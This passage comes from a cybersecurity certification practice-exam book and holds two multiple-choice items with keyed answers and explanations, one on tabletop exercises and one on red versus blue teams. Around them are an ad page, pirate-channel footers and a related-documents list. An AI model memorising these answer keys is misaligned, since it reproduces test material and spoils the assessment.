ble. After further investigation, it is determined that your agency
is a victim of a DNS amplification attack that is currently over-
whelming your DNS server and network bandwidth. An over-
whelmingly large number of Internet spoofed IP addresses are
involved in the attack. The above scenario can be considered a
tabletop exercise. (TRUE/FALSE)
(A) TRUE
(B) FALSE

Explanation 74. The correct answer is TRUE. Training is a

critical step in being prepared to respond to real cybersecurity
incidents. A quick and easy way to help prepare your team is to
hold short 15-minute tabletop exercises every month.

The goal of the tabletop exercise is to increase security situa-

tional awareness and to facilitate discussion of incident re-
sponse in as simple a manner possible; targeting a time range
of 15 minutes. The exercises provide an opportunity for man-
agement to present realistic scenarios to a workgroup for the
development of response processes.

173
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 75. Which of the following statements describes the
difference between the Red team and the Blue team in a cyber-
security testing exercise?
(A) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to defend the attack
(B) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to both defend and attack
(C) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to defend the attack
(D) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to both defend and attack

Explanation 75. A red team imitates an attacker and at-

tacks with characteristic tactics and techniques while a
blue team is there to find ways to defend the attack is the
correct answer.

A red team consists of security professionals who act as ad-

versaries to overcome cybersecurity controls. Red teams often
consist of independent ethical hackers who evaluate system
174
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
security in an objective manner. They utilize all the available
techniques (discussed below) to find weaknesses in people,
processes, and technology to gain unauthorized access to as-
sets.

A blue team consists of security professionals who have an in-

side out view of the organization. Their task is to protect the or-
ganization’s critical assets against any kind of threat. They are
well aware of the business objectives and the organization’s
security strategy. Therefore, their task is to strengthen the cas-
tle walls so no intruder can compromise the defenses.

175
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
176
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
THE END

177
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Enrich your online experience with Exams-
Digest.
Your purchase of this product includes free access to all 100+
practice questions online and much more at examsdigest.com.
You will have access for one (1) month. You may also access
our full library of Practice exams and share with other learners.
Send us an email to [email protected] now and start your
online practice experience!

ExamsDigest includes:
✓ Access to 3000+ Questions
✓ Access to 300+ Quizzes
✓ 13+ Certification Paths
✓ 24/7 Support
✓ Interactive Interview Questions
✓ Access on the go

About ExamsDigest.
ExamsDigest is a global, education tech-oriented company that
doesn’t sleep. Their mission is to be a part of your life transfor-
mation by providing you the necessary training to hit your ca-
reer goals.

178
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}

Sy0-701 - Lesson 14
No ratings yet
Sy0-701 - Lesson 14
26 pages
CH 03
No ratings yet
CH 03
124 pages
Firewall Training
No ratings yet
Firewall Training
123 pages
CompTIA A+ 220-1102
No ratings yet
CompTIA A+ 220-1102
69 pages
Sy0-701 - Lesson 10
No ratings yet
Sy0-701 - Lesson 10
18 pages
Unit 4 - Public Key Cryptography
No ratings yet
Unit 4 - Public Key Cryptography
50 pages
A10 5.2.1-P3 SSLi
No ratings yet
A10 5.2.1-P3 SSLi
447 pages
Brkiot 2720
No ratings yet
Brkiot 2720
73 pages
Specification Sheets - OT Cyber Security
No ratings yet
Specification Sheets - OT Cyber Security
23 pages
Isp Incident Response Plan
No ratings yet
Isp Incident Response Plan
15 pages
Hidden Files 5.0 2023-Bhopal
No ratings yet
Hidden Files 5.0 2023-Bhopal
10 pages
Cyber Security Complete Journey - Red Team #1
No ratings yet
Cyber Security Complete Journey - Red Team #1
32 pages
(FreeCourseWeb - Com) B08HHSY83JEBOK
No ratings yet
(FreeCourseWeb - Com) B08HHSY83JEBOK
273 pages
Terrorism: Commentary On Security Documents Volume 141: Hybrid Warfare and The Gray Zone Threat 1st Edition Douglas Lovelace
100% (1)
Terrorism: Commentary On Security Documents Volume 141: Hybrid Warfare and The Gray Zone Threat 1st Edition Douglas Lovelace
55 pages
Manthan Volume 3
No ratings yet
Manthan Volume 3
49 pages
High Availability Troubleshooting Guide
No ratings yet
High Availability Troubleshooting Guide
41 pages
Cyber Fraud and Prevention Final
No ratings yet
Cyber Fraud and Prevention Final
34 pages
DojoLab CompTIA Security Ebook Updated
No ratings yet
DojoLab CompTIA Security Ebook Updated
72 pages
CLI Commands PDF
No ratings yet
CLI Commands PDF
365 pages
Challenge4 Step by Step
No ratings yet
Challenge4 Step by Step
18 pages
Cisco Identity Services Engine (ISE) v3.1: Common Criteria Operational User Guidance and Preparative Procedures
No ratings yet
Cisco Identity Services Engine (ISE) v3.1: Common Criteria Operational User Guidance and Preparative Procedures
148 pages
CSS QB Ans
No ratings yet
CSS QB Ans
12 pages
IoMT Authentication Scheme Presentation
No ratings yet
IoMT Authentication Scheme Presentation
10 pages
06 CPwE - ISE - CVD Enet-Td008 - En-P PDF
No ratings yet
06 CPwE - ISE - CVD Enet-Td008 - En-P PDF
111 pages
CertMaster Network+ (N10-009) Module 9 - Presentation Slides
No ratings yet
CertMaster Network+ (N10-009) Module 9 - Presentation Slides
44 pages
Cybersecurity Certification Statistics Report
No ratings yet
Cybersecurity Certification Statistics Report
58 pages
Armis Use Cases For OT Environments
No ratings yet
Armis Use Cases For OT Environments
11 pages
Proposal Template
No ratings yet
Proposal Template
3 pages
WP A Solution Guide To Operational Technology Cybersecurity
No ratings yet
WP A Solution Guide To Operational Technology Cybersecurity
40 pages
FCP - WCS - AD-7.4 (35 Questions)
0% (1)
FCP - WCS - AD-7.4 (35 Questions)
5 pages
8.1P Final
No ratings yet
8.1P Final
13 pages
Project Topic Chapter One
No ratings yet
Project Topic Chapter One
8 pages
CCNA 200-301 - Lab-22 HSRP v1.0
No ratings yet
CCNA 200-301 - Lab-22 HSRP v1.0
22 pages
A Day in The Life of A Cybersecurity Professional
No ratings yet
A Day in The Life of A Cybersecurity Professional
46 pages
70-298: MCSE Guide To Designing Security For A Microsoft Windows Server 2003 Network
No ratings yet
70-298: MCSE Guide To Designing Security For A Microsoft Windows Server 2003 Network
52 pages
Sturtle Security Exam Dumps
No ratings yet
Sturtle Security Exam Dumps
10 pages
PPT ch07
No ratings yet
PPT ch07
64 pages
PDF Makalah Kewirausahaan Di Era Digital DL
No ratings yet
PDF Makalah Kewirausahaan Di Era Digital DL
23 pages
10 WLAN Troubleshooting Basics
No ratings yet
10 WLAN Troubleshooting Basics
73 pages
CoinPoker RNG
No ratings yet
CoinPoker RNG
6 pages
Essential of E-Commerce
No ratings yet
Essential of E-Commerce
2 pages
CompTIA A+ 220-1001 Core 1 Course Notes by Professor Messers - 019-021
No ratings yet
CompTIA A+ 220-1001 Core 1 Course Notes by Professor Messers - 019-021
3 pages
APEX Security Checklist
No ratings yet
APEX Security Checklist
3 pages
Network Programmability With Cisco APIC-EM
No ratings yet
Network Programmability With Cisco APIC-EM
43 pages
Firewall
No ratings yet
Firewall
4 pages
Cabling Installation & Maintenance
No ratings yet
Cabling Installation & Maintenance
37 pages
Cisco Email Security Solutions 11 Lab v1.2: About This Demonstration
100% (1)
Cisco Email Security Solutions 11 Lab v1.2: About This Demonstration
98 pages
Catalyst 6500 Series and Cisco 7600 Series Firewall Services Module Installation and Configuration Note
No ratings yet
Catalyst 6500 Series and Cisco 7600 Series Firewall Services Module Installation and Configuration Note
218 pages
CCNA Webinar Deck Jan0108
No ratings yet
CCNA Webinar Deck Jan0108
37 pages
CompTIA Cybersecurity Analyst (CySA+)
100% (1)
CompTIA Cybersecurity Analyst (CySA+)
14 pages
Cross-Domain Security in Web Applications: Hapter
No ratings yet
Cross-Domain Security in Web Applications: Hapter
83 pages
Understanding Cisco Cybersecurity Operations Fundamentals (CBROPS) v1.0
No ratings yet
Understanding Cisco Cybersecurity Operations Fundamentals (CBROPS) v1.0
4 pages
CCSI Test Paper
No ratings yet
CCSI Test Paper
53 pages
Case Study - Generative AI Applications in Key Industries
No ratings yet
Case Study - Generative AI Applications in Key Industries
2 pages
A Study On Major Challenges Faced by Hotel Industry Globally
No ratings yet
A Study On Major Challenges Faced by Hotel Industry Globally
12 pages
Oauth
No ratings yet
Oauth
3 pages
Hacking Test
No ratings yet
Hacking Test
42 pages
Checkpoint Firewall Administration Training Part2
No ratings yet
Checkpoint Firewall Administration Training Part2
29 pages
Lab 1 - Researching Network Attacks and Security Audit Tools
No ratings yet
Lab 1 - Researching Network Attacks and Security Audit Tools
5 pages
CCNA 200-301 Official Cert Guide, Volume 2-13
No ratings yet
CCNA 200-301 Official Cert Guide, Volume 2-13
3 pages
Check Point Cyber Security Engineering (Ccse) : Course Topics Course Objectives
No ratings yet
Check Point Cyber Security Engineering (Ccse) : Course Topics Course Objectives
1 page
Assessment Test
No ratings yet
Assessment Test
6 pages
Lexcode Cyber Security Sphere
100% (1)
Lexcode Cyber Security Sphere
5 pages
Security Domain Three Notes
No ratings yet
Security Domain Three Notes
2 pages
Pen Test Questionnaire - Summit Consulting LTD
No ratings yet
Pen Test Questionnaire - Summit Consulting LTD
4 pages
Esa Initial Setup Wizard
No ratings yet
Esa Initial Setup Wizard
15 pages
Challenges 62443
No ratings yet
Challenges 62443
18 pages
300 725 SWSA v1.1
No ratings yet
300 725 SWSA v1.1
3 pages
Guam Military Comm Infrastructure MAR 2008
No ratings yet
Guam Military Comm Infrastructure MAR 2008
14 pages
Comptia Security Sy0 501 Exam Objectives
No ratings yet
Comptia Security Sy0 501 Exam Objectives
20 pages
WF-500 Datasheet
No ratings yet
WF-500 Datasheet
2 pages
CyberOps v1.1 Scope and Sequence PDF
No ratings yet
CyberOps v1.1 Scope and Sequence PDF
5 pages
Fundamentals of Wireless LANs Answer
No ratings yet
Fundamentals of Wireless LANs Answer
74 pages
Cisco CUCM - SIP Integration With Zoom
No ratings yet
Cisco CUCM - SIP Integration With Zoom
4 pages
CCIE Enterprise Wireless v1 Exam Topics
No ratings yet
CCIE Enterprise Wireless v1 Exam Topics
6 pages
Take Assessment CCNP BCMSN Final 3: (Version 5.0)
100% (2)
Take Assessment CCNP BCMSN Final 3: (Version 5.0)
14 pages
Wireless LAN - WLAN: Mohamed Mokdad Ecole D'ingénieurs de Bienne
No ratings yet
Wireless LAN - WLAN: Mohamed Mokdad Ecole D'ingénieurs de Bienne
58 pages
Mastering Active Directory
From Everand
Mastering Active Directory
VICTOR P HENDERSON
No ratings yet
MCSA: Windows 10 Complete Study Guide: Exam 70-698 and Exam 70-697
From Everand
MCSA: Windows 10 Complete Study Guide: Exam 70-698 and Exam 70-697
William Panek
No ratings yet
Hybrid Cloud Management with Red Hat CloudForms
From Everand
Hybrid Cloud Management with Red Hat CloudForms
Sangram Rath
No ratings yet
MCSA Windows 10 Study Guide: Exam 70-698
From Everand
MCSA Windows 10 Study Guide: Exam 70-698
William Panek
No ratings yet
Deploying and Managing a Cloud Infrastructure: Real-World Skills for the CompTIA Cloud+ Certification and Beyond: Exam CV0-001
From Everand
Deploying and Managing a Cloud Infrastructure: Real-World Skills for the CompTIA Cloud+ Certification and Beyond: Exam CV0-001
Abdul Salam
No ratings yet
Network Time Protocol Second Edition
From Everand
Network Time Protocol Second Edition
Gerardus Blokdyk
No ratings yet
Symantec Certification: Find out how to pass Symantec exams and get certifications focusing only on the exam tests. Real Practice Test With Detailed Screenshots, Answers And Explanations
From Everand
Symantec Certification: Find out how to pass Symantec exams and get certifications focusing only on the exam tests. Real Practice Test With Detailed Screenshots, Answers And Explanations
David Mayer
No ratings yet
Windows Server 2008 For Dummies
From Everand
Windows Server 2008 For Dummies
Ed Tittel
No ratings yet
26 Ways to Save on Your Utility Bills!: 26 Ways, #1
From Everand
26 Ways to Save on Your Utility Bills!: 26 Ways, #1
Kimberly Peters
No ratings yet
Kaspersky security center
From Everand
Kaspersky security center
Mohammed Haytham Khabbaz samkary
No ratings yet
Building Telephony Systems with OpenSER
From Everand
Building Telephony Systems with OpenSER
Goncalves Flavio E.
No ratings yet
Configuring IPCop Firewalls: Closing Borders with Open Source
From Everand
Configuring IPCop Firewalls: Closing Borders with Open Source
Barrie Dempster
No ratings yet
Drive testing The Ultimate Step-By-Step Guide
From Everand
Drive testing The Ultimate Step-By-Step Guide
Gerardus Blokdyk
No ratings yet